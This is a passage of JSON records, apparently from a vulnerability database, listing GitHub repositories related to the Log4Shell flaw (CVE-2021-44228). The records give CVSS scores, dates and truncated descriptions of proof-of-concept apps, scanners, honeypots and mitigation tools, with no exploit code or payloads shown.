"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T18:35:16", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-24T07:11:30", "id": "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:40:22", "description": "![Log4j___logo](https://user-images.githubusercontent.com/726...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T16:01:36", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:09", "id": "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:47:09", "description": "# CVE-2021-44228!\r\n\r\nThe current program remove the class \"org/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T15:04:31", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T22:38:29", "id": "C1878361-BBB3-5A2F-8212-945883518690", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:25:50", "description": "# Log4jUnifi\nExploiting CVE-2021-44228 in Unifi Network Applicat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T13:18:49", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-07T09:52:41", "id": "D64C04EA-093F-5924-A39B-714908D4637E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:30:34", "description": "# log4j Spring vulnerable POC\n\nThis is a POC for a simple spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T15:00:58", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T22:15:47", "id": "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:31:33", "description": "# SnapAttack Log4j / CVE-2021-44228 / log4shell Resources\n\n## Wh...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T18:51:52", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-22T06:34:31", "id": "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:41:20", "description": "# `log4jail` \ud83d\udee1\ufe0f\n\nA fast firewall reverse proxy with TLS (HTTPS) ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T19:29:11", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-06-30T21:38:46", "id": "23A2D479-181C-599C-9C0F-9A2FF201348F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:31:52", "description": "#CVE-2021-44228\n\nWindows Batch Script to Scan all current path s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T10:16:22", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T09:04:57", "id": "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:35:12", "description": "[![Java CI](https://github.com/Nikolas-Charalambidis/cve-2021-44...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T17:23:47", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-12-02T02:40:53", "id": "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:17:55", "description": "# jankybank\nInspired by and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-25T21:35:32", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-25T21:37:58", "id": "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:07:58", "description": "# Log4Shell POC (CVE-2021-44228)\n\nThe scope of this repository i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T19:26:36", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-12-08T19:20:20", "id": "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:23:11", "description": "<a href=\"https://github.com/vidrez/Ethical-Hac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-19T08:03:05", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-28T09:52:20", "id": "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T21:25:25", "description": "# Searchable Log4j database\n Searchable page for [CISA Log4j (CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T03:37:03", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-17T00:21:21", "id": "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T21:16:17", "description": "# CVE-2021-44228\n\n[![Dockerfile](https://github.com/ahmad4fifz/C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T04:09:36", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T04:09:57", "id": "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:31:24", "description": "# TekiumLog4jApp v1.0\n\nAuthor: Erick Rodr\u00edguez \n\nEmail: erickrr....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T17:59:56", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T20:16:38", "id": "254068B4-97B4-5DCF-A60F-5206B6DD230E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T21:00:10", "description": "# log4j-scanner\nA Log4j vulnerability scanner is automated scann...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-17T11:01:24", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-10T04:02:56", "id": "9B0163DC-EE41-5E66-9AA8-A960262A2072", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T21:26:30", "description": "# JndiRemover\n\u041d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043c\u043e\u0434 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T15:48:03", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T19:26:15", "id": "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:56:05", "description": "# Minecraft Log4j Honeypot\n\nThis honeypots runs fake Minecraft s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T23:35:31", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-12-04T05:40:56", "id": "E6E03693-50B8-5AB4-B766-8464A228BA02", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:04:12", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T21:13:46", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-26T17:22:36", "id": "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "### Join Community\n\n[Telegram](https://t.me/vPwnd)\n\n# CVE-2021-4...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T13:28:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache 